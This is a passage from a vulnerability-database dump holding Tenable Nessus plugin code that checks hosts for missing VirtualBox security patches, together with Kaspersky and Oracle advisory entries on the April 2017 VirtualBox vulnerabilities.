reference:\"virtualbox-guest-tools-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-x11-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-x11-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-host-kmp-default-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-host-kmp-default-debuginfo-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-host-source-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-qt-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-qt-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-websrv-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-websrv-debuginfo-5.0.40-40.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc\");\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-11-01T03:01:52", "bulletinFamily": "scanner", "description": "This update for virtualbox to version 5.1.22 fixes the following\nissues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data. 
These non-security issues\n were fixed :\n\n - GUI: don", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-533.NASL", "href": "https://www.tenable.com/plugins/nessus/99956", "published": "2017-05-03T00:00:00", "title": "openSUSE Security Update : virtualbox (openSUSE-2017-533)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-533.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99956);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\", \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\", \"CVE-2017-3587\");\n\n script_name(english:\"openSUSE Security Update : virtualbox (openSUSE-2017-533)\");\n script_summary(english:\"Check for the openSUSE-2017-533 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for virtualbox to version 5.1.22 fixes the following\nissues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data. 
These non-security issues\n were fixed :\n\n - GUI: don't check if the Extension Pack is up-to-date if\n the user is about to install a new Extension Pack \n\n - GUI: fixed a possible crash when switching a\n multi-monitor VM into full-screen or seamless mode\n\n - GUI: several mini-toolbar fixes in full-screen /\n seamless mode \n\n - GUI: don't crash on restoring defaults in the appliance\n import dialog\n\n - ICH9: fix for Windows guests with a huge amount (more\n than 64G) of guest memory\n\n - BIOS: fixed El Torito hard disk emulation geometry\n calculation \n\n - VMM: fixed VERR_IEM_INSTR_NOT_IMPLEMENTED Guru\n Meditation under certain conditions\n\n - Storage: fixed a potential hang under rare circumstances\n\n - Storage: fixed a potential crash under rare\n circumstances (asynchronous I/O disabled or during\n maintenance file operations like merging snapshots)\n\n - Linux hosts: make the ALSA backend work again as well as\n loading the GL libraries on certain hosts\n\n - Linux Additions: fixed mount.vboxsf symlink problem\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1034854\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-virtualbox-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-virtualbox-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-debugsource-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-devel-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-desktop-icons-5.1.22-19.10.1\") ) flag++;\nif 
( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-kmp-default-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-tools-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-tools-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-x11-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-x11-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-host-kmp-default-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-host-kmp-default-debuginfo-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-host-source-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-qt-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-qt-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-websrv-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-websrv-debuginfo-5.1.22-19.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc\");\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-11-17T19:57:21", "bulletinFamily": "scanner", "description": "The version of Oracle VM VirtualBox installed on the remote host is\n5.0.x prior to 5.0.38 
or 5.1.x prior to 5.1.20. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to disclose potentially\n sensitive information. (CVE-2017-3513)\n\n - A flaw exists in the Shared Folder component,\n specifically when cooperating guests access files\n within a shared folder while moving it. A local attacker\n within a guest can exploit this to read arbitrary files\n on the host. (CVE-2017-3538)\n\n - Multiple unspecified flaws exist in the Core component\n that allow a local attacker to impact confidentiality,\n integrity, and availability. (CVE-2017-3558,\n CVE-2017-3559, CVE-2017-3561, CVE-2017-3563,\n CVE-2017-3576)\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to impact integrity and\n availability. (CVE-2017-3575)\n\n - An unspecified flaw exists in the Shared Folder\n component that allows a local attacker to impact\n integrity and availability. (CVE-2017-3587)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2019-11-02T00:00:00", "id": "VIRTUALBOX_5_1_20.NASL", "href": "https://www.tenable.com/plugins/nessus/99509", "published": "2017-04-20T00:00:00", "title": "Oracle VM VirtualBox 5.0.x < 5.0.38 / 5.1.x < 5.1.20 (April 2017 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99509);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-3513\",\n \"CVE-2017-3558\",\n \"CVE-2017-3559\",\n \"CVE-2017-3561\",\n \"CVE-2017-3563\",\n \"CVE-2017-3575\",\n \"CVE-2017-3576\",\n \"CVE-2017-3587\"\n );\n script_bugtraq_id(\n 97698,\n 97730,\n 97732,\n 97736,\n 97739,\n 97744,\n 97750,\n 97755,\n 97759\n );\n\n script_name(english:\"Oracle VM VirtualBox 5.0.x < 5.0.38 / 5.1.x < 5.1.20 (April 2017 CPU)\");\n 
script_summary(english:\"Performs a version check on VirtualBox.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle VM VirtualBox installed on the remote host is\n5.0.x prior to 5.0.38 or 5.1.x prior to 5.1.20. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to disclose potentially\n sensitive information. (CVE-2017-3513)\n\n - A flaw exists in the Shared Folder component,\n specifically when cooperating guests access files\n within a shared folder while moving it. A local attacker\n within a guest can exploit this to read arbitrary files\n on the host. (CVE-2017-3538)\n\n - Multiple unspecified flaws exist in the Core component\n that allow a local attacker to impact confidentiality,\n integrity, and availability. (CVE-2017-3558,\n CVE-2017-3559, CVE-2017-3561, CVE-2017-3563,\n CVE-2017-3576)\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to impact integrity and\n availability. (CVE-2017-3575)\n\n - An unspecified flaw exists in the Shared Folder\n component that allows a local attacker to impact\n integrity and availability. 
(CVE-2017-3587)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?623d2c22\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.virtualbox.org/wiki/Changelog\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle VM VirtualBox version 5.0.38 / 5.1.20 or later as\nreferenced in the April 2017 Oracle Critical Patch Update advisory.\n\nNote that vulnerability CVE-2017-3538 was fixed in versions 5.0.34 and\n5.1.16.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3576\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:vm_virtualbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"virtualbox_installed.nasl\", \"macosx_virtualbox_installed.nbin\");\n script_require_ports(\"installed_sw/Oracle VM VirtualBox\", \"installed_sw/VirtualBox\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = NULL;\napps = make_list('Oracle VM VirtualBox', 'VirtualBox');\n\nforeach app (apps)\n{\n if (get_install_count(app_name:app)) break;\n else app = NULL;\n}\n\nif (isnull(app)) audit(AUDIT_NOT_INST, 'Oracle VM VirtualBox');\n\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\n\n# Affected :\n# 5.0.x < 5.0.38 / 5.1.x < 5.1.20\nif (ver =~ '^5\\\\.0' && ver_compare(ver:ver, fix:'5.0.38', strict:FALSE) < 0) fix = '5.0.38';\nelse if (ver =~ '^5\\\\.1' && ver_compare(ver:ver, fix:'5.1.20', strict:FALSE) < 0) fix = '5.1.20';\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n\nport = 0;\nif (app == 'Oracle VM VirtualBox')\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\n\nreport =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\nexit(0);\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:29", "bulletinFamily": "info", "description": "### *Detect date*:\n04/24/2017\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Oracle VM VirtualBox. 
Malicious users can exploit these vulnerabilities to cause a denial of service, read and write accessible data and possibly to obtain sensitive information.\n\n### *Affected products*:\nOracle VM VirtualBox earlier than 5.0.38 \nOracle VM VirtualBox 5.1.x earlier than 5.1.20\n\n### *Solution*:\nUpdate to the latest versions \n[Download Oracle VM VirtualBox](<https://www.virtualbox.org/wiki/Downloads>)\n\n### *Original advisories*:\n[Oracle Critical Patch Update Advisory](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Oracle VirtualBox](<https://threats.kaspersky.com/en/product/Oracle-VirtualBox/>)\n\n### *CVE-IDS*:\n[CVE-2017-3575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3575>) 3.6 Warning \n[CVE-2017-3576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3576>) 4.6 Warning \n[CVE-2017-3513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3513>) 1.9 Warning \n[CVE-2017-3587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3587>) 3.6 Warning \n[CVE-2017-3558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3558>) 4.6 Warning \n[CVE-2017-3559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3559>) 4.3 Warning \n[CVE-2017-3561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3561>) 4.6 Warning \n[CVE-2017-3563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3563>) 4.6 Warning", "modified": "2019-03-07T00:00:00", "published": "2017-04-24T00:00:00", "id": "KLA11027", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11027", "title": "KLA11027 Multiple vulnerabilities in Oracle VM VirtualBox", "type": "kaspersky", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oracle": [{"lastseen": "2019-05-29T18:21:19", "bulletinFamily": "software", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. 
Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 300 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [April 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2252203.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
